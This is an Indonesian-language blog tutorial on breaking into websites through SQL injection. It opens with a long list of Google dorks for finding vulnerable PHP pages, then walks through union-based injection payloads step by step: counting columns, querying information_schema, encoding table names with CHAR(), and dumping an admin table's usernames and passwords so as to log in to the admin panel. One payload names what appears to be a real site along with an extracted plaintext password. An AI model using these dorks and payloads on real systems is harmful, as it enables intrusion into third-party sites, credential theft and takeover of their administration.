Alat : Browser Firefox . Kenapa harus firefox ? Karena kita harus menginstall addons HACKBAR yang [sepertinya] hanya ada di Firefox. Hackbar itu seperti apa sih ? Nih screenshotnya ;
Fungsinya ? Simak saja tutorialnya sampai akhir maka anda akan tahu fungsi dari hackbar. Untuk yang belum menginstall hackbar silahkan menuju link berikut :
https://addons.mozilla.org/id/firefox/addon/hackbar/
Oke, kita mulai tutorialnya :
Step 1 :
Dork paste di google :
source.php?id=
dl.php?id=
service.php?id=
anime.php?id=
application.php?id=
plugin.php?id=
purchase.php?id=
report.php?id=
world.php?id=
overview.php?id=
journal.php?id=
static.php?id=
content.php?id=
projects.php?id=
record.php?id=
feed.php?id=
topic.php?id=
display_main.php?id=
blog.php?id=
subcatergory.php?id=
author.php?id=
inside.php?id=
popup2.php?id=
work.php?id=
trailers.php?id=
howto.php?id=
play.php?id=
press_release.php?id=
mirrors.php?id=
interview.php?id=
contribute.php?id=
entry.php?id=
standard.php?id=
country.php?id=
flash_games.php?id=
flash.php?id=
flashgames.php?id=
file.php?id=
skill.php?id=
links.php?id=
form.php?id=
single.php?id=
book.php?id=
node.php?id=
release.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: preg_match()
“id=” & intext:”Warning: ilesize()
“id=” & intext:”Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: is_writable()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?* *=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?* *=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?* *=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?* *=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?* *=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?* *=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=
bisa kalian kreasikan sendiri :D
cotoh website: http://target.com/content/research.php?cid=2
Kita tambahkan tanda kitip satu ['] atau tanda takterhingga [~] di akhri url untuk memastikan apakah webnya vuln SQLi atau tidak.
Sehingga menjadi : http://target.com/content/research.php?cid=2'
Step 2 :
Lanjut. Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” . Cari hingga menemukan error.
http://target.com/content/research.php?cid=2 order by 1-- normal
http://target.com/content/research.php?cid=2 order by 2-- normal
http://target.com/content/research.php?cid=2 order by 3-- normal
http://target.com/content/research.php?cid=2 order by 4-- normal
http://target.com/content/research.php?cid=2 order by 5-- normal
http://target.com/content/research.php?cid=2 order by 6-- ERROR
di "order by 6" kita mendapatkan error dengan tulisan : Unknown column '6' in 'order clause'. Sekarang kita sudah tahu kalo jumlah kolom di databasenya ada 5.
Step 3 :
Sekarang kita mulai mencari "angka" yang bisa kita injeksi di step sejanjutnya dengan memasukkan perintah union select. Perhatikan saja url yang saya tulis dibawah :
http://target.com/content/research.php?cid=-2 union select 1,2,3,4,5-- [ ingat, setelah ?cid= diberi tanda - ]
Muncul angka 3 dan 4 .
Step 4 :
Sekarang kita coba untuk melihat versi php dengan angka ajaib tadi. Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi.
http://target.com/content/research.php?cid=-2 union select 1,2,version(),4,5 -- [karena 3 tadi termasuk angka ]
Tertulis 5.1.61 . Versi php 5 . Berarti tutorial ini masih bisa dilanjutkan. Karena jika menemukan php versi 4 kita harus menebak sendiri isi/tabel dari databasenya.
Step 5 :
Kita akan memunculkan nama-nama table yang ada di dalam database dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda --
http://target.com/content/research.php?cid=-2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--
Kita melihat ada table admin, research, vcounter .
Step 6 :
Sekarang main logika disini. Dimana biasanya akan disimpan data berupa user dan password ? Tentu jawabannya adalah di table admin. Kita coba melihat kolom dari table admin tersebut .
Disinilah hackbar dibutuhkan. Untuk merubah suatu kata menjadi bentuk MySQL CHAR(). Caranya : klik tombol SQL -> MySQL -> MySQL CHAR() . Lalu kita convert kata "admin" menjadi bentuk MySQL CHAR() .
Dan hasil convert dari kata admin adalah CHAR(97, 100, 109, 105, 110)
Step 7 :
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah “ group_concat(table_name) ” dengan perintah “ group_concat(column_name) ” dan mengganti perintah “ information_schema.tables “ menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name=[hasil convert MySQL CHAR() - Step 6] ”
http://target.com/content/research.php?cid=-2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
Kita mendapat kolom aid, admin id, admin pass di tabel admin.
Step 8 :
Sekarang kita coba membuka data yang ada di kolom aid, admin id , dan admin pass .
Caranya ialah mengganti perintah group_concat(table_name) menjadi group_concat(aid,0x3a,admin_id,0x3a,admin_pass) dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ . disitu kita melihat ada tanda 0x3a. Apa maksudnya ? 0x3a adalah bentuk HEX dari tanda : sehingga data nanti akan dipisah dengan tanda : .
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--
Kita mendapatkan data berikut ;
aid : 1
Admin ID : admin
Admin Pass : bimogay
Step 9 :
Sekarang kita coba mencari halaman loginnya. Tidak bakal jauh dari kata "admin" ataupun "login" . Kalo malas mencari manual, cari dengan software Admin Finder. Cari sendiri di Google.
Kita menemukan halaman loginnya terletak di :
http://target.com/admin ( kalian bisa mencari page adminnya lewat havij)
Masukkan user dan password sesuai dengan data yang telah kita dapat.
Postingan
0 Comments
Bagaimana Pendapat Anda ?